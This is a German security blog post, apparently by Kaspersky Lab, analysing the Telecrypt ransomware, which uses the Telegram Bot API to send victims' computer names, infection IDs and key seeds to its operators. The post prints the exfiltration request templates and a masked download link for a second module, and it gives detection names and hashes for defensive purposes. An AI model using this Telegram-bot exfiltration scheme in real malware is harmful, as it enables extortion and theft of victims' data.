Erste Ransomware, die Telegram nutzt

Inhalt

Verschlüsselungsschädlinge lassen sich im Allgemeinen in zwei Gruppen einteilen:

  1. Ransomware, die Online-Verschlüsselung unterstützt;
  2. Ransomware, die Online-Verschlüsselung nicht unterstützt.

Die Notwendigkeit, das Internet bei der Verschlüsselung der Nutzerdaten zu verwenden, kann sich aus mehreren Gründen ergeben. Beispielsweise könnte es sein, dass die Angreifer der Ransomware den Schlüssel zur Chiffrierung schicken und von dieser dann im Gegenzug Informationen für die spätere Dechiffrierung der Dateien des Opfers erhalten.

Um die Daten von dem Schädling erhalten zu können, brauchen die Virenschreiber einen speziellen Dienst. Dieser Dienst muss durch unbeteiligte Forscher geschützt sein, was wiederum zusätzliche Ausgaben für die Entwicklung dieses Dienstes von den Cyberbetrügern fordert.

Im vergangenen Monat entdeckten wir eine Ransomware, die russische Nutzer angreift, und zu deren Besonderheiten es gehört, dass sie das Protokoll des Messengers Telegram nutzt, um den Angreifern den Dechiffrierungsschlüssel zu übermitteln.

Das ist der erste uns bekannte Fall, bei dem das Telegram-Protokoll von Verschlüsselungsschädlingen verwendet wird.

Dateianalyse

Der Trojaner ist in Delphi programmiert und hat eine Größe von über 3 MB. Nach dem Start generiert der Schädling einen Schlüssel zur Chiffrierung der Dateien sowie eine Infektions-ID – infection_id.

Daraufhin verbindet er sich mit Hilfe der öffentlich zugänglichen Telegram Bot API mit den Cyberkriminellen. Das heißt, dass der Trojaner eigentlich die Funktion eines Telegram-Bots ausführt und mittels der öffentlichen API Mitteilungen an seine Schöpfer versendet.

Zu diesem Zweck haben die Hacker im Vorwege einen „Telegram-Bot“ erstellt. Sie erhielten von den Telegram-Servern einen einmaligen Token, der den neu erstellten Bot eindeutig identifiziert, und platzierten ihn im Körper des Trojaners, damit dieser die Telegram-API benutzen kann.

Zunächst verschickt der Trojaner eine Anfrage an die Adresse https://api.telegram.org/bot<token>/GetMe, wobei <token> der einmalige Identifikator des von den Cyberkriminellen erstellten Telegram-Bots ist. Gemäß der offiziellen Dokumentation der API ist es mit der Methode getMe möglich zu überprüfen, ob es einen Bot mit dem angegebenen Token gibt und – ist das der Fall – grundlegende Informationen über ihn zu erhalten. Der Trojaner verwendet die vom Server zurückgegebenen Informationen über den Bot in keiner Weise.

Die folgende Anfrage versendet der Trojaner mit Hilfe der Methode sendMessage, die es dem Bot ermöglicht, mit einer vorgegebenen Nummer Mitteilungen in den Chat zu schicken. Der Schädling verwendet eine hart kodierte Chat-Nummer und berichtet seinen Herren über eine erfolgreiche Infektion:

https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

Die folgenden Parameter werden von dem Trojaner übermittelt:

<chat> – Nummer des Chats mit dem Cybererpresser;

<computer_name> – Name des infizierten Computers;

<infection_id> – Infektions-ID;

<key_seed> – Zahl, auf deren Grundlage der Schlüssel zur Chiffrierung der Dateien generiert wurde.

Sind die Informationen abgeschickt, sucht der Schädling auf den Festplatten nach Dateien mit den vorgegebenen Erweiterungen und verschlüsselt sie Byte für Byte mit einem äußerst einfachen Multiplikationsalgorithmus mit den Bytes des Schlüssels.

Erste Ransomware, die Telegram nutzt

Erweiterungen der zu verschlüsselnden Dateien

Je nach Konfiguration hängt der Trojaner an die verschlüsselten Dateien die Erweiterung „.Xcri“ an oder aber ändert die Erweiterung gar nicht. Das von uns entdeckte Sample des Trojaners verändert die Erweiterung nicht. Die Liste der verschlüsselten Dateien wird in der Textdatei %USERPROFILE%\Desktop\Datenbank verschl Dateien.txt gespeichert.

Nachdem die Verschlüsselung abgeschlossen ist, versendet der Trojaner die folgende Anfrage: https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop

Alle Parameter sind so wie in der vorangegangenen Anfrage, nur am Ende wird das Wort „stop“ hinzugefügt.

Daraufhin lädt der Schädling von einer kompromittierten Website auf WordPress das zusätzliche Modul Xhelp.exe (Link: http://***.ru/wp-includes/random_compat/Xhelp.exe) und führt es aus. Dieses Modul – die Cyberverbrecher nennen es „Informator“ – verfügt über eine grafische Benutzeroberfläche. Es setzt das Opfer darüber in Kenntnis, was passiert ist, und stellt gleichzeitig die Lösegeldforderung. Die Summe beträgt 5.000 Rubel (etwas über 70 €), und als mögliche Bezahlarten werden Qiwi und der russische Bezahldienst „Yandex.Dengi“ angegeben.

Erste Ransomware, die Telegram nutzt

Erste Ransomware, die Telegram nutzt

Erste Ransomware, die Telegram nutzt

Mitteilung, die dem Erpressungsopfer angezeigt wird

Die Kommunikation zwischen Opfer und Erpressern erfolgt über ein Eingabefeld im „Informator“-Interface. Diese Funktionalität wird ebenfalls über das Versenden einer Telegram-Mitteilung mit Hilfe der Methode sendMessage umgesetzt.

Die Fülle an Rechtschreibfehlern im Text der Lösegeldforderung lässt an einem höheren Bildungsniveau der Trojaner-Autoren zweifeln. Auch die folgende Erklärung fällt auf: „Danke, dass Sie dem Fonds junger Programmierer helfen“.

Fazit

Alle Produkte von Kaspersky Lab detektierten diese Bedrohung unter den folgenden Bezeichnungen:

Trojan-Ransom.Win32.Telecrypt
PDM:Trojan.Win32.Generic

MD5:

3e24d064025ec20d6a8e8bae1d19ecdb – Trojan-Ransom.Win32.Telecrypt.a (Hauptmodul)
14d4bc13a12f8243383756de92529d6d – Trojan-Ransom.Win32.Telecrypt.a (Info-Modul)

Sollten Sie Opfer dieses Verschlüsselungsschädlings geworden sein, bitten wir Sie eindringlich, kein Lösegeld an die Erpresser zu zahlen! Wenden Sie sich an unseren Technischen Support und wir werden Ihnen dabei helfen, Ihre Dateien wiederherzustellen.

Ähnliche Beiträge

Es gibt 1 Kommentar
  1. Thomas

    Ja wirklich ein Bericht, der nur fúr Kenner in diesem Bereich gilt…
    Ich vestehe hier nur Bahnhof, aber ok…

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.